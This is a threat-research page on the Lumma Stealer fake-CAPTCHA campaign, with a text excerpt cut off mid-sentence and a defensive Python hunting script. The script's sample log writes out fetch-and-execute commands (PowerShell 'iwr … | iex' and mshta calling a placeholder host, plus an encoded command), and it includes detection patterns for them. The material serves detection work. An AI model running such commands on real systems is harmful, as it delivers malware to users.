Summary

Lumma Stealer is an information-stealing malware sold through a Malware-as-a-Service (MaaS) model. It specializes in stealing sensitive data such as passwords, browser data, and cryptocurrency wallet details. Its operators have advanced their tactics, moving from traditional phishing to fake CAPTCHA verification pages and abusing legitimate software to deliver Lumma Stealer. These deceptive delivery methods make Lumma Stealer a persistent threat.

Fig 1: Lumma Stealer Execution Chain

Threat actors frequently create phishing sites hosted on various providers, often leveraging Content Delivery Networks (CDNs). These sites either use exploits or trick users into executing the payload themselves. The Qualys Threat Research Unit (TRU) has been monitoring an active Lumma Stealer campaign. Recently, we observed the use of fake CAPTCHA pages to trick users into executing the payload. The campaign uses multi-stage fileless techniques to deliver its final payload, which makes this threat both deceptive and persistent. We investigated the entire attack chain, from initial infection to data exfiltration, and assessed the Qualys EDR tool to show how it can protect against such threats. We also provide key threat detection and hunting queries that analysts can add to their playbooks to detect such threats in real time.

Campaign Analysis

We speculate that users are redirected to these fake CAPTCHA sites by bad actors exploiting legit…
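The excerpt above mentions hunting queries for the fake-CAPTCHA, fileless delivery chain but does not reproduce them. The following is an added illustration written for this page; it is not Qualys TRU's code and not one of the report's queries. It assumes that the user-executed stage runs through a Windows script host (powershell.exe, mshta.exe, wscript.exe, cscript.exe, cmd.exe) launched from explorer.exe or a browser, and that the command line carries download-and-execute or obfuscation markers; the page does not name the interpreter, so that is an assumption. The log records are constructed Sysmon-style process-creation lines, not telemetry from the campaign, and example.invalid is a placeholder host.

```python
"""
Hunting heuristic for a fake-CAPTCHA / fileless delivery chain.

Added example, not Qualys TRU code. Assumption: the user-executed stage is a
Windows script host spawned from a user-facing parent (explorer.exe or a
browser), or a script host whose command line shows at least two
download/obfuscation markers. Log lines below are constructed, not real.
"""
import re
from dataclasses import dataclass

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "cmd.exe"}
USER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}

# (pattern, label) pairs; order determines the order of reasons reported
SUSPICIOUS_ARGS = [
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "in-memory evaluation"),
    (re.compile(r"\b(?:downloadstring|invoke-webrequest|iwr|curl)\b", re.I), "remote fetch"),
    (re.compile(r"\bmshta(?:\.exe)?\s+(?:https?|vbscript):", re.I), "mshta remote/script URI"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I), "hidden window"),
    (re.compile(r"https?://", re.I), "URL in command line"),
]


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str


def parse_event(line):
    """Parse 'Image=...|ParentImage=...|CommandLine=...' (maxsplit keeps '|' in the command line)."""
    fields = dict(part.split("=", 1) for part in line.split("|", 2))
    return ProcEvent(fields["Image"], fields["ParentImage"], fields["CommandLine"])


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return the list of reasons an event is flagged; empty list means not flagged."""
    if basename(ev.image) not in SCRIPT_HOSTS:
        return []
    markers = [label for pat, label in SUSPICIOUS_ARGS if pat.search(ev.command_line)]
    parent = basename(ev.parent_image)
    from_user = parent in USER_PARENTS
    # A user-facing parent needs one marker; any other parent needs two.
    if (from_user and markers) or len(markers) >= 2:
        return ([f"launched from {parent}"] if from_user else []) + markers
    return []


def hunt(lines):
    """Run the heuristic over raw log lines; return (image name, reasons) for each hit."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = score_event(ev)
        if reasons:
            hits.append((basename(ev.image), reasons))
    return hits


# Constructed sample records (not real telemetry). Lines 1, 2 and 6 should fire.
SAMPLE_LOG = [
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=powershell -w hidden -c "iwr https://example.invalid/verify.txt | iex"',
    r'Image=C:\Windows\System32\mshta.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=mshta https://example.invalid/captcha.hta',
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\System32\services.exe|CommandLine=powershell.exe -NoProfile -File C:\Scripts\inventory.ps1',
    r'Image=C:\Windows\System32\cmd.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=cmd.exe /c dir',
    r'Image=C:\Program Files\Google\Chrome\Application\chrome.exe|ParentImage=C:\Windows\explorer.exe|CommandLine="chrome.exe" https://example.invalid/verify',
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\System32\svchost.exe|CommandLine=powershell -nop -w hidden -enc SQBFAFgA',
]

if __name__ == "__main__":
    for image, reasons in hunt(SAMPLE_LOG):
        print(f"{image}: {', '.join(reasons)}")
```

The two-tier rule (one marker when the parent is explorer.exe or a browser, two markers otherwise) keeps ordinary interactive use such as `cmd.exe /c dir` out of the results while still catching a later stage re-launched by a service or scheduled task. Tune SCRIPT_HOSTS and USER_PARENTS to the environment's baseline before using the rule for alerting rather than hunting.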